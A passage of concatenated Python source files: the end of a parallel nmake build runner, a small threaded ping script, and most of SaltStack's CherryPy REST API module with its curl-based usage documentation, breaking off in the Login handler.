def waitComplete(self):
self._schedule.join()
def startSchedule(self):
self._schedule = threading.Thread(target=self.Schedule)
self._schedule.start()
def Schedule(self):
for i in range(self._processNum):
task = threading.Thread(target=self.startTask)
task.daemon = False
self.running.append(task)
self.runningLock.acquire(True)
for thread in self.running:
thread.start()
self.runningLock.release()
while len(self.running) > 0:
time.sleep(0.1)
if self.error:
print("subprocess not exit successfully")
print(self.errorMsg)
def startTask(self):
while True:
if self.error:
break
self.pendingLock.acquire(True)
if len(self.pending) == 0:
self.pendingLock.release()
break
task = self.pending.pop(0)
self.pendingLock.release()
try:
task.run()
except RuntimeError as e:
if self.error: break
self.errorLock.acquire(True)
self.error = True
self.errorMsg = str(e)
time.sleep(0.1)
self.errorLock.release()
break
self.runningLock.acquire(True)
self.running.remove(threading.currentThread())
self.runningLock.release()
def Run():
curdir = os.path.abspath(os.curdir)
if len(args.subdirs) == 1:
args.jobs = 1
if args.jobs == 1:
try:
for dir in args.subdirs:
RunCommand(os.path.join(curdir, dir), "nmake", args.target, stdout=sys.stdout, stderr=subprocess.STDOUT)
except RuntimeError:
exit(1)
else:
controller = ThreadControl(args.jobs)
for dir in args.subdirs:
controller.addTask(RunCommand, os.path.join(curdir, dir), "nmake", args.target)
controller.startSchedule()
controller.waitComplete()
if controller.error:
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog=__prog__, description=__description__ + __copyright__, conflict_handler='resolve')
parser.add_argument("target", help="the target for nmake")
parser.add_argument("subdirs", nargs="+", help="the relative dir path of makefile")
parser.add_argument("--jobs", type=int, dest="jobs", default=cpu_count, help="thread number")
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
Run()
|
pinging.py
|
import threading
import subprocess
def get_ping(host):
return subprocess.Popen(["ping", "-c", "1", "-n", host]).communicate()
if __name__ == "__main__":
hosts = [
"google.com",
"yandex.ru",
"vk.com",
"habr.com",
"python.org",
"mipt.ru",
]
threads = [threading.Thread(target=get_ping, args=(host,)) for host in hosts]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/saltstack-netapi-client-java
- Python: https://github.com/saltstack/pepper
:configuration:
All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
from __future__ import absolute_import
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending positional args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
